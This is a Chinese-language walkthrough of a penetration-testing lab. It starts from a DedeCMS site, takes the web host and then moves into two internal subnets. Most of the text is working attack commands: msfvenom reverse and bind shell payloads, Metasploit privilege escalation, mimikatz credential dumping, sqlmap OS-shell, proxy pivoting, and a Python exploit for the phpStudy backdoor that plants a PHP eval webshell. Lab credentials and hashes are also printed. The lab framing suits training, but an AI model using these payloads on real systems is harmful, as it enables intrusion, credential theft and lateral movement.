Dedecms打点入内网

简介: Dedecms打点入内网

此项目出自月师傅项目四

靶场网络图 (ps:kali ip 前后不一样,中途机器故障了重装了)

已知目标主机:

ip:192.168.137.95

域名:www.cc123.com

信息收集

网站信息:

http://192.168.137.95:999/

http://192.168.137.95:6588/

640.png

子域名

www.cc123.com

ww2.cc123.com

new.cc123.com

打开new.cc123.com 发现为dedecms

百度查找历史漏洞发现存在sql注入
得到密码解码
admin7788 后台上传webshell

无法命令,查看目录得知 存在net系统上传asp大马

msf 生成木马 反弹shell

权限不足,所以需要扫描网站路径查找可读可写可执行

通过文件获取到

C:\windows\debug\WIA\

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<exploit ip> LPORT=4444 -f exe > s.exe

上传成功

监听端口

640.png

getuid 权限较低 提权
扫描可提取的漏洞
use post/multi/recon/local_exploit_suggester
set session 1
exploit

使用ms16-075提权
use exploit/windows/local/ms16_075_reflection_juicy
不太稳定 试了两次

然后搜索flag

640.png640.png

在查找flag的时候,会发现wwwroot下 有两个web目录,分别对应两个站点,后续渗透中,会发现是站库分离的,数据库密码就在当前机器上。

扫描ww2.cc123.com

目录扫描
python .\dirsearch.py -u http://ww2.cc123.com/
登录后台
http://ww2.cc123.com/admin/
编辑器
http://ww2.cc123.com/editor/
弱口令爆破 cc123
万能密码也成功进入后台

抓包sqlmap扫描  前期asp大马也可以进行查看

http://ww2.cc123.com//admin/aboutadd.aspx?id=7&pid=6

将数据包保存到1.txt

python sqlmap.py -r 1.txt --dbms mssql -v 1 --batch

列出库
python sqlmap.py -r 1.txt --dbms mssql -v 1 --dbs

获取 mssql shell 
python sqlmap.py -r 1.txt --dbms mssql -v 1 --os-shell

.net 代码审计过,本人未接触过,步骤是使用软件反编译dll文件为代码然后审计

在session 查找web.config  这样大马才可以连接

640.png

ip:10.10.10.3

账号:sa

密码:!@#a123..

640.png

解码得

admin AE5F6187F32825CA
cc123 B97C57DB005F954242450A255217DA9F
admin cc123
cc123 qweasd123

内网渗透

查看ip

查看路由

run get_local_subnets

哈希获取

哈希解密比较费劲,加载 minikazi 获取明文密码(SYSTEM)

load kiwi
kiwi_cmd sekurlsa::logonpasswords

添加路由渗透

run autoroute -s 10.10.10.0/24

启动socks 代理

use auxiliary/server/socks4a
run

配置proxychina.conf

    socks4 127.0.0.1 1080

    获取数据库机器

    目前已经知道了数据库的密码,需要进一步获取主机shell

      msfvenom -p windows/meterpreter/bind_tcp LPORT=7777 -f exe > bind.exe

      mssql 文件上传

      开启监听

      use exploit/multi/handler 
      set payload windows/meterpreter/bind_tcp 
      set RHOST 10.10.10.3
      set lport 7777

      640.png

      当前session 是x86位数,要执行密码抓取,需要x64位数的进程

      迁移进程获取密码

      640.png

        ps 查看进程
        migrate pid


        信息收集后发现又存在另一个c

        添加路由

        run autoroute -s 10.10.1.0/24

        640.png

        探测存活主机

        for /L %I in (1,1,254) Do @ping -w 1 -n 110.10.1.%I | findstr "TTL="

        640.png

        探测端口

          proxychains nmap -sT -Pn 10.10.1.2

          看到445优先考虑 会存在永恒之蓝,的确扫描出来了,但无session返回

          浏览器设置代理

          访问80

          python 编写exp

          import requests
          import sys
          import base64
          shell = "system('"+sys.argv[1]+"');"
          shell_base64 = base64.b64encode(shell.encode('utf-8'))
          header={'Accept-charset':shell_base64,'Accept-Encoding':'gzip,deflate'}
          def exploit(url):
              html = requests.get(url=url,headers=header).text
              return html
          url = "http://10.10.1.2/"
          print(exploit(url))

          proxychains3 python3 phpstudy.py "echo ^<?php @eval(\$_POST[\"shell\"]);?^>>c:\phpstudy\WWW\shell.php"

          640.png

          配置代理 kall 做为代理机器更改proxychina.conf

            socks4 192.168.137.12 1080  # ip 改为本地ip

            Windows 开启socks4

            上传bind.exe

            msf 正向监听

            获取密码

              meterpreter > kiwi_cmd sekurlsa::logonpasswords
              ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process

              再次迁移进程

              整个内网已经全部拿下。


              相关文章
              |
              2月前
              |
              数据挖掘
              Emlog程序屏蔽用户IP拉黑名单插件
              Emlog程序屏蔽用户IP拉黑名单插件
              38 9
              Emlog程序屏蔽用户IP拉黑名单插件
              |
              19天前
              |
              弹性计算 负载均衡 安全
              阿里云国际版源站IP暴露的解决办法
              阿里云国际版源站IP暴露的解决办法
              |
              6月前
              |
              缓存 网络协议 安全
              阿里云DNS常见问题之新疆地区无法访问网址如何解决
              阿里云DNS(Domain Name System)服务是一个高可用和可扩展的云端DNS服务,用于将域名转换为IP地址,从而让用户能够通过域名访问云端资源。以下是一些关于阿里云DNS服务的常见问题合集:
              |
              4月前
              自动测域名延迟的导航页面源码
              好看导航页面可自动测域名延迟,该源码是html源码,可以做个引导页面,需要的朋友可以下载使用
              37 0
              |
              6月前
              |
              前端开发 安全 搜索推荐
              【专栏】ngrok` 是一款让本地服务器暴露到公网的工具,提供外网访问、临时公网地址、安全隧道及实时更新功能
              `【4月更文挑战第29天】ngrok` 是一款让本地服务器暴露到公网的工具,提供外网访问、临时公网地址、安全隧道及实时更新功能。使用简单,包括下载客户端、注册认证、启动本地服务和执行命令。在前端开发中,ngrok 用于本地开发调试、跨设备测试、前后端联调、演示分享和应急处理。它提高了开发效率,简化网络环境和部署问题。无论是移动应用测试还是团队协作,ngrok 都能发挥关键作用,是前端开发者必备神器。尝试使用 ngrok,提升你的开发体验。
              388 3
              |
              6月前
              |
              网络协议 安全 测试技术
              Windows安装禅道系统结合Cpolar实现公网访问内网BUG管理服务
              Windows安装禅道系统结合Cpolar实现公网访问内网BUG管理服务
              |
              6月前
              |
              安全 Java Linux
              如何实现无公网IP及服务器实现公网环境企业微信网页应用开发调试
              如何实现无公网IP及服务器实现公网环境企业微信网页应用开发调试
              109 2
              |
              6月前
              |
              数据采集 定位技术 Python
              Python爬虫IP代理技巧,让你不再为IP封禁烦恼了! 
              本文介绍了Python爬虫应对IP封禁的策略,包括使用代理IP隐藏真实IP、选择稳定且数量充足的代理IP服务商、建立代理IP池增加爬虫效率、设置合理抓取频率以及运用验证码识别技术。这些方法能提升爬虫的稳定性和效率,降低被封禁风险。
              |
              小程序 网络安全
              当后台架设好了域名正常,但是小程序真机调试出现网络异常,模拟确实正常可以使用
              当后台架设好了域名正常,但是小程序真机调试出现网络异常,模拟确实正常可以使用
              138 0
              |
              关系型数据库 MySQL 网络安全
              自建个人音乐播放器Navidrome - 内网穿透实现在外随时访问
              自建个人音乐播放器Navidrome - 内网穿透实现在外随时访问
              1546 1